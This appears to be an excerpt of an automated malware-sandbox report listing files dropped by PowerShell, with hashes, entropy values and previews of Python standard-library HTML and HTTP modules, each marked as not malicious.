                                                                                                                                                                                                                      Preview:"""..General functions for HTML manipulation..."""....import re as _re..from html.entities import html5 as _html5......__all__ = ['escape', 'unescape']......def escape(s, quote=True):.. """.. Replace special characters "&", "<" and ">" to HTML-safe sequences... If the optional flag quote is true (the default), the quotation mark.. characters, both double quote (") and single quote (') characters are also.. translated... """.. s = s.replace("&", "&amp;") # Must be done first!.. s = s.replace("<", "&lt;").. s = s.replace(">", "&gt;").. if quote:.. s = s.replace('"', "&quot;").. s = s.replace('\'', "&#x27;").. return s......# see https://html.spec.whatwg.org/multipage/parsing.html#numeric-character-reference-end-state...._invalid_charrefs = {.. 0x00: '\ufffd', # REPLACEMENT CHARACTER.. 0x0d: '\r', # CARRIAGE RETURN.. 0x80: '\u20ac', # EURO SIGN.. 0x81: '\x81', # <control>.. 0x82: '\u201a', # SINGLE LOW-9 QUOTATION MA
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4433
                                                                                                                                                                                                                      Entropy (8bit):5.615915239975206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:XnejUKUrNYG36aSJk57iX8Y3bNMjYRaUJJAikUe:XVSzpJkFiXJbNgW3Jn/e
                                                                                                                                                                                                                      MD5:F65DD6868C57F44AFE1D784443F9A6B8
                                                                                                                                                                                                                      SHA1:15D53B70369CBFE915D307D9B63BEC9BF2651A90
                                                                                                                                                                                                                      SHA-256:8F596713D0B52A04B84F0CE52469F0D035F5E166014F860258EE9B81D0A14997
                                                                                                                                                                                                                      SHA-512:E6411F992724585F1EBAD5E14F18CD2657761BAE11054D27C8A0E0CA0BDF46950B25542B5CE2D41A1A359ABAC3D4A318B775D301A278F06980509889C2A459A9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e+.........................8.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.dNd...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..d&d'..i.d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI....Z.h.dJ..Z.dK..Z...e.j...................dL........Z.dM..Z.y.)Oz*.General functions for HTML manipulation.......N)...html5..escape..unescapec..........................|.j...................d.d.........}.|.j...................d.d.........}.|.j...................d.d.........}.|.r$|.j...................d.d.........}.|.j...................d.d.........}.|.S.).z.. Replace special characters "&", "<" and ">" to HTML-safe sequences.. If the optional flag quote is true (the default), the quotation mark. characters, both double quote (") and single quote (') characters are also. translated.. ..&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#x27;)...replace)...s..quotes.... .SC:\Users\Administrat
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):97717
                                                                                                                                                                                                                      Entropy (8bit):6.265032277171077
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:mHh9diX3e0u+4lPX5VYHaLnBAsEsZT1eIm/js5EC0cbXzVAjtVH4+Ao7VXNk3xBK:Wi3e0ulGaDBAPYw/jHdMX6jv4hee3xBK
                                                                                                                                                                                                                      MD5:9BA10A511DF2E5C71858C8718BB538E4
                                                                                                                                                                                                                      SHA1:E5DBD76EDB4DBBAA448A5EEAFB22971C786D9912
                                                                                                                                                                                                                      SHA-256:A244DF797811D5A4BCBB797B65638C8EAB590B1DA54E3FF09AF42B2581959B58
                                                                                                                                                                                                                      SHA-512:9CD769692DBE5BCFCB3F2DE7C852DB4875F7A77CB77E31B4DC6E1D8F09020FD4A7651677DC2956F5849159B06B3C6DD29810AD60922288E391921312C8FABB5D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e.0.........................`....d.Z.g.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..i.d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE....i.dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17205
                                                                                                                                                                                                                      Entropy (8bit):5.295200299884825
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ywUeKDRntdyD5rBIz0yGI0ZdXohaTDil4HHar25M0/wGLoYZB:ywUeKtry1rBIIZ1RTDi6aO/wdI
                                                                                                                                                                                                                      MD5:DE1F71D5D0B685AED8835DCF57C623DF
                                                                                                                                                                                                                      SHA1:1A97F6022BDEB6B591FFF1C4259DDF42587E8647
                                                                                                                                                                                                                      SHA-256:93373BD1E484800C5D5CCFF084585D59752C967D6D04EA1278AEE3F55ED94074
                                                                                                                                                                                                                      SHA-512:7F39543BFB2F29BF6C0AEFB10566309D66AA64106F036FB2972700940B5E7AA636F9B061BB7844848A107F6424A2BA04C6B97537D87C0EFE37D85143F750631B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........efD..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.g.Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.e.j ..........................Z...e.j...................d.........Z...e.j...................d.........Z...G.d...d.e.j(..........................Z.y.).z.A parser for HTML and XHTML......N)...unescape..HTMLParserz.[&<]z.&[a-zA-Z#]z%&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]z)&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]z.<[a-zA-Z]..>z.--\s*>z+([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*z]((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*aF.... <[a-zA-Z][^\t\n\r\f />\x00]* # tag name. (?:[\s/]* # opt
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):78025
                                                                                                                                                                                                                      Entropy (8bit):4.815868450525149
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:pawUaq4jxcGpzdKpp5Tiy2U2rAYMviMHLnqCpIFbkfjOqWNAh9Kkp3QbYMFZL/hQ:tUaq4jxHpzYpB7D
                                                                                                                                                                                                                      MD5:154955F3B5FD44F2C48EEAAF58557FC7
                                                                                                                                                                                                                      SHA1:3E26EBBC09DD47A7FA98663309C92FF836DE286A
                                                                                                                                                                                                                      SHA-256:FA0B2845437AA3680AA6C33457D7A242DD303ED27C2A5073772D1C2B04D62473
                                                                                                                                                                                                                      SHA-512:534BBADFFB08454C57690D24D603FDD00E78A4C709993BF479B0E4FFF11399C9CB2D3F9DE21C8504D865F25AC37F55B9CEC67FA806C1260777678A005675BF90
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""HTML character entity references."""....__all__ = ['html5', 'name2codepoint', 'codepoint2name', 'entitydefs']......# maps HTML4 entity name to the Unicode code point..name2codepoint = {.. 'AElig': 0x00c6, # latin capital letter AE = latin capital ligature AE, U+00C6 ISOlat1.. 'Aacute': 0x00c1, # latin capital letter A with acute, U+00C1 ISOlat1.. 'Acirc': 0x00c2, # latin capital letter A with circumflex, U+00C2 ISOlat1.. 'Agrave': 0x00c0, # latin capital letter A with grave = latin capital letter A grave, U+00C0 ISOlat1.. 'Alpha': 0x0391, # greek capital letter alpha, U+0391.. 'Aring': 0x00c5, # latin capital letter A with ring above = latin capital letter A ring, U+00C5 ISOlat1.. 'Atilde': 0x00c3, # latin capital letter A with tilde, U+00C3 ISOlat1.. 'Auml': 0x00c4, # latin capital letter A with diaeresis, U+00C4 ISOlat1.. 'Beta': 0x0392, # greek capital letter beta, U+0392.. 'Ccedil': 0x00c7, # latin capital letter C with c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17510
                                                                                                                                                                                                                      Entropy (8bit):4.314713635799775
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:/nuoCu1HTLuI2NLCGW/BojKL1BeiN82ATa:/nuoz1HUNL0BojQN8na
                                                                                                                                                                                                                      MD5:2747AB5DFB91F1C7B53632330FEC404A
                                                                                                                                                                                                                      SHA1:7CEFFD2DC594764AC3206CF6DCD15F4F6DD6891B
                                                                                                                                                                                                                      SHA-256:ED37C8DED84AFEF74DFD671F8A20911F58B379BEF8F577739C05DBFA99115017
                                                                                                                                                                                                                      SHA-512:BA7F7AE36FB923F241B399F8C358D914AC807E83FBCEA8C36EA0DFBB0BE4D2222AFA034708E915A6136C72D30C2210865218A1C70284535CF75007753EC980FB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""A parser for HTML and XHTML."""....# This file is based on sgmllib.py, but the API is slightly different.....# XXX There should be a way to distinguish between PCDATA (parsed..# character data -- the normal case), RCDATA (replaceable character..# data -- only char and entity references and end tags are special)..# and CDATA (character data -- only end tags are special).......import re..import _markupbase....from html import unescape......__all__ = ['HTMLParser']....# Regular expressions used for parsing....interesting_normal = re.compile('[&<]')..incomplete = re.compile('&[a-zA-Z#]')....entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')..charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')....starttagopen = re.compile('<[a-zA-Z]')..piclose = re.compile('>')..commentclose = re.compile(r'--\s*>')..# Note:..# 1) if you change tagfind/attrfind remember to update locatestarttagend too;..# 2) if you change tagfind/attrfind and/or locatestarttagend the parser wi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8508
                                                                                                                                                                                                                      Entropy (8bit):5.096832707441712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:VFcbQSi4+TbKatPR4qXiasXh+O5ZSsB3CeAXI5UKZYcLXhGsIU:VFFyqXiasXzgep5UKZYQsU
                                                                                                                                                                                                                      MD5:C8809BF3CEE30939A61E235849DDFCFB
                                                                                                                                                                                                                      SHA1:51CBA6DA7D66CCC0652D1A57190AB8484D533109
                                                                                                                                                                                                                      SHA-256:420E7F74A3B5062B7CD1EB820962980FCCA3CDEA512C1FD6B641326F70A54F4E
                                                                                                                                                                                                                      SHA-512:A8035C3DC101DD9A75723B5E7B46C43B7D4915AC75E0E2F6BA5821B29E1735F1A78088D07DAA38B49A3B3A5C732BB6F7D7C98F632882384B0D7665C9B3E738F0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from enum import StrEnum, IntEnum, _simple_enum....__all__ = ['HTTPStatus', 'HTTPMethod']......@_simple_enum(IntEnum)..class HTTPStatus:.. """HTTP status codes and reason phrases.... Status codes from the following RFCs are all observed:.... * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616.. * RFC 6585: Additional HTTP Status Codes.. * RFC 3229: Delta encoding in HTTP.. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518.. * RFC 5842: Binding Extensions to WebDAV.. * RFC 7238: Permanent Redirect.. * RFC 2295: Transparent Content Negotiation in HTTP.. * RFC 2774: An HTTP Extension Framework.. * RFC 7725: An HTTP Status Code to Report Legal Obstacles.. * RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2).. * RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).. * RFC 8297: An HTTP Status Code for Indicating Hints.. * RFC 8470: Using Early Data in HTTP..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9534
                                                                                                                                                                                                                      Entropy (8bit):5.928087068885846
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:TsdArTB8kaKaNzpZOKDcxHN/812MHb4kvrneU5Wny:7MzpZOKDcpNG2c3v5Wny
                                                                                                                                                                                                                      MD5:E5740594883FB6D0800B55E5149D8252
                                                                                                                                                                                                                      SHA1:BAF2FDF74245DA2DA3F316FC3DD78DFA32E40A31
                                                                                                                                                                                                                      SHA-256:EB2DC9763A307F50B21909287AF14B551EDA7DAF64E41B62B9665B7383729D92
                                                                                                                                                                                                                      SHA-512:490FFC47C6529A619AD97C6C3DB38B7DF2B8181FEE7183061062FCB22CB0F3D45D570C661949B18818A709D8A8D45943C85EEC388E8A00EDD27ABBCD1DD2802F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e<!........................t.....d.d.l.m.Z.m.Z.m.Z...d.d.g.Z...e.e...........G.d...d.................Z...e.e...........G.d...d.................Z.y.)......)...StrEnum..IntEnum.._simple_enum..HTTPStatus..HTTPMethodc.....................`.....e.Z.d.Z.d.Z.dGd...Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d Z#d!Z$d"Z%d#Z&d$Z'd%Z(d&Z)d'Z*d(Z+d)Z,d*Z-d+Z.d,Z/d-Z0d.Z1d/Z2d0Z3d1Z4d2Z5d3Z6d4Z7d5Z8d6Z9d7Z:d8Z;d9Z<d:Z=d;Z>d<Z?d=Z@d>ZAd?ZBd@ZCdAZDdBZEdCZFdDZGdEZHyF)Hr....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. *
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):56902
                                                                                                                                                                                                                      Entropy (8bit):5.2137338588970685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:hG3VgCFg3B/soqIrS0Vo11Be2jlrHlUgbKO5SJUqViyD:hG3VgCFgp2+wuOKH
                                                                                                                                                                                                                      MD5:7F0FD15E95559F17D0565ADBB9007DED
                                                                                                                                                                                                                      SHA1:97C6F748EE0C9FAD67189296BAAE83C382699BE6
                                                                                                                                                                                                                      SHA-256:9E69B0C2CCFC239423653E1F7CAB6F2A546CDC74675C75A938F8B3B71F5F7C4C
                                                                                                                                                                                                                      SHA-512:FDBCCD25FE92CD3DEC3065C37C2418C5FEB0C02187C38117F966A04190F6792AC33713BDAC10A098ABBE20134F97FCE89AB672916CDF15C120443E9DF2DFE64A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e..........................b.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.........j-..................e.j...................j0............................e.j...................j0..................j3..........................D...c.i.c.]...}.|.|.j4........................c.}.Z.d.Z.d.Z...e.j<..................d.........j>..................Z ..e.j<..................d.........jB..................Z"..e.j<..................d.........Z#..e.j<..................d.........Z$h.d...Z%d>d...Z&d.e'd.e'f.d...Z(..G.d...d.e.jR..................jT..........................Z+d...Z,e+f.d...Z-e+f.d...Z...G.d...d.e.j^..........................Z0d...Z1..G.d...d.........Z2..d.d.l3Z3..G.d ..d!e2........Z4e.jk..................d!............G.d"..d#e7........Z8..G.d$..d%e8........Z9..G.d&..d'e8........Z:..G.d(..d)e8........Z;..G.d*..d+e8........Z<..G.d,..d-e8........Z=..G.d...d/e8........Z>..G.d0..d1e8........Z?..G.d2..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):81662
                                                                                                                                                                                                                      Entropy (8bit):5.402599481839976
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:2YyLT18X8niIS6n1LKP4aCKwI8DZGz7+p/soSe:2YysK1Rf7cmpEDe
                                                                                                                                                                                                                      MD5:FB27AB27C9AEC1D16D563D24F914829A
                                                                                                                                                                                                                      SHA1:CFDBA1C7ED63C96AAF3AEC48B9AFA4E1F4DD2ACE
                                                                                                                                                                                                                      SHA-256:B25F129BE0E29FDCD51C1EC7CD6BBB4ECCBB7421A0EA3AB04B07D5DC6628DD89
                                                                                                                                                                                                                      SHA-512:12E260ACBFF41EA1AC7E3A7B15F70AA6AAE84E01174CEA6F7349EC8000CF8E49AEFB16C14E4E9B11D7DAC5D4AB31B216D1B4D4A1F0E0ABA8E4D0889D96ECE2B0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e.6........................j.....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d...Z.d.Z.d.Z...e.e.j,..................j...........................Z...e.j2..................d.........Z.d.Z.d.Z.d...Z.d.Z.d...Z.g.d...Z g.d...Z!e!D...c.g.c.]...}.|.jE................................c.}.Z#dKd...Z$dKd...Z%d.d.d.d.d...Z&..e.j2..................d.e.jN..........................Z(d...Z)d...Z*..e.j2..................d.e.jN..........................Z+..e.j2..................d.e.jX..................e.jN..................z...........Z-..e.j2..................d.e.j\..................e.jN..................z...........Z/d...Z0..e.j2..................d.e.j\..................e.jN..................z...........Z1d...Z2d...Z3..e.j2..................d.........Z4..e.j2..................d.........Z5..e.j2..................d ........Z6..e.j2..................d!........Z7d"..Z8..e.j2..................d#........Z9d$..Z:d%..Z;d&..Z<..e.j2........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21579
                                                                                                                                                                                                                      Entropy (8bit):5.425087182091203
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ThqTxFfuySriLbb9fVyb2CVozo6o4GV+h3ysKCokVsHhEvl33/9:iTj9fVyb2CVozNo4GVrsLokVsBEvl331
                                                                                                                                                                                                                      MD5:DEECB1F81E952A5B6A7AAC809B6EE7C5
                                                                                                                                                                                                                      SHA1:1D7763C5D5BB7F10A7CDB8F38E92A327C94326E2
                                                                                                                                                                                                                      SHA-256:8C1029761C4CC955CF293352F566AB5BC49653D1F26909A31556A1559FD570B8
                                                                                                                                                                                                                      SHA-512:890A779115A648EE1AFF6FA20CEACE14653C538580FBA3CF472D362DC2F65F658C6F4B0E8E5BC7293562BBAA00E600809DAA857618AA4DFF38E9091351311440
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........efR..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j...................Z.d.j...................Z.d.j...................Z...G.d...d.e.........Z.e.j...................e.j...................z...d.z...Z.e.d.z...Z...e...e.d...................e...e.e.e.................z...D...c.i.c.]...}.|.d.|.z.........c.}.Z.e.j)....................e.d.........d...e.d.........d.i.............e.j*..................d...e.j,..................e.........z...........j...................Z.d...Z...e.j*..................d.........Z...e.j*..................d.........Z.d...Z.g.d...Z.g.d...Z.d.e.e.f.d...Z...G.d...d.e ........Z!d.Z"e"d.z...Z#..e.j*..................d.e"z...d.z...e#z...d.z...e.jH..................e.jJ..................z...........Z&..G.d ..d!e ........Z'..G.d"..d#e'........Z(y.c...c.}.w.)$a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):58623
                                                                                                                                                                                                                      Entropy (8bit):4.4264268152656525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:l3z+3hB5SQi1oScyNzBoVQOQBWhc4oHCL9uKRkstPU:l3z+3hB5SQi1oScyNzBoVQOQBWACL978
                                                                                                                                                                                                                      MD5:7DB16F63DD2F1E2CBD38770EFD82F540
                                                                                                                                                                                                                      SHA1:6ED81ABC88A0B20B622EB5CC9E2105D8902B1023
                                                                                                                                                                                                                      SHA-256:D09ABC3FBD8AF7997AD0E22202B8D120A7827FB0F12DD0B0E6BCB9FC7F9EDA0F
                                                                                                                                                                                                                      SHA-512:C0B36CA07B8349D596BE72E6B691944024A7D14054630B23E387AAE1B7C7F88045DDF4F4F0741E65E78C00DD52B48F2A1006F00F357311CFD6B09E8021C905EA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:r"""HTTP/1.1 client library....<intro stuff goes here>..<other stuff, too>....HTTPConnection goes through a number of "states", which define when a client..may legally make another request or fetch the response for a particular..request. This diagram details these state transitions:.... (null).. |.. | HTTPConnection().. v.. Idle.. |.. | putrequest().. v.. Request-started.. |.. | ( putheader() )* endheaders().. v.. Request-sent.. |\_____________________________.. | | getresponse() raises.. | response = getresponse() | ConnectionError.. v v.. Unread-response Idle.. [Response-headers-read].. |\____________________.. | |.. | response.read() | putrequest().. v v.. Idle Req-started-unread-response.. ______/|.. /
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):79559
                                                                                                                                                                                                                      Entropy (8bit):4.460811276790579
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Gsf53CLTKr88g99gZ5T2SLbzf7bbVbFVJRyx67NF:G0I7jgZ5ZD/ZFbRs6ZF
                                                                                                                                                                                                                      MD5:104EE963A477A64AB8692C88CE98D57B
                                                                                                                                                                                                                      SHA1:FCEB2607FA42C983BD9C3F3BFEAE8F2ACE1115C7
                                                                                                                                                                                                                      SHA-256:F4C1FAC9A8323FAB6840BEECDA77C69F83FDD72F9345B3D8259C5CC1015FDA4E
                                                                                                                                                                                                                      SHA-512:D0EFE42484B974807F3EC63B56FAA9E012F2F81D9E335304EFC9813F32D2606837DDD3D703DFBC1E2F133FEC42442F1619BA6DC2B8E35265D20693FA74D48973
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:r"""HTTP cookie handling for web clients.....This module has (now fairly distant) origins in Gisle Aas' Perl module..HTTP::Cookies, from the libwww-perl library.....Docstrings, comments and debug strings in this code refer to the..attributes of the HTTP cookie system as cookie-attributes, to distinguish..them clearly from Python attributes.....Class diagram (note that BSDDBCookieJar and the MSIE* classes are not..distributed with the Python standard library, but are available from..http://wwwsearch.sf.net/):.... CookieJar____.. / \ \.. FileCookieJar \ \.. / | \ \ \.. MozillaCookieJar | LWPCookieJar \ \.. | | \.. | ---MSIEBase | \.. | / | | \.. | / MSIEDBCookieJar BSDDBCookieJar.. |/.. MSIECookieJar...."""....__all__ = ['Cookie', 'Cook
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21094
                                                                                                                                                                                                                      Entropy (8bit):4.737928355464598
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ShNUZtUx0dqJ1sJxttmT+tOVVyeuPFcLIcfOuu7jvxyXWNYN:ShNUZmx0dCsNPFGIcfyM+YN
                                                                                                                                                                                                                      MD5:BB19E50B174A51A5972C7DFD8F142ADB
                                                                                                                                                                                                                      SHA1:FE6E9FB17F72042FF2EF00FC6E7F5C51631D2F3C
                                                                                                                                                                                                                      SHA-256:D049D9DE921DD9A2D13CD205FC0ABED14691CDDC8BA6F3C174653AF938ECD79F
                                                                                                                                                                                                                      SHA-512:993B3238D231137B5E703FC4ADC0FD2A263A6EB7D07FDBFCA11DEEC422184A99C8ABAD6F2CE8F6A36C253D5967BAE8BA921261C636BE4F4B4A3B7D22A05EB27A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:####..# Copyright 2000 by Timothy O'Malley <timo@alum.mit.edu>..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software..# and its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Timothy O'Malley not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS..# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY..# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR..# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,..# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS..# ACTION, ARISING
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):49836
                                                                                                                                                                                                                      Entropy (8bit):4.568587656018124
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:lfng3S+gSOsn6f0aKucGIEgA0BBrETVp5tU6N0Y+:lvg3S+7OsnQ0aKucGIEOBCTZN0Y+
                                                                                                                                                                                                                      MD5:475B51062BC286BBFCEB982AC56F8EDF
                                                                                                                                                                                                                      SHA1:B54CD3951C705D433363EB74C79CAB7158897691
                                                                                                                                                                                                                      SHA-256:240BA27E5469B77E14BCD0F912F778FCFF79CFD423B281DAB0CDB1AC4BB0F32F
                                                                                                                                                                                                                      SHA-512:2AD5D0345ACA53EC5C9C8040581F25B7E22AB5FC1F64EC8AC70B2C63ED3ECC1A4092776E8E75A14E874E9F3047274259B073F29412633B82ECD48C65BE32972C
                                                                                                                                                                                                                      Malicious:false
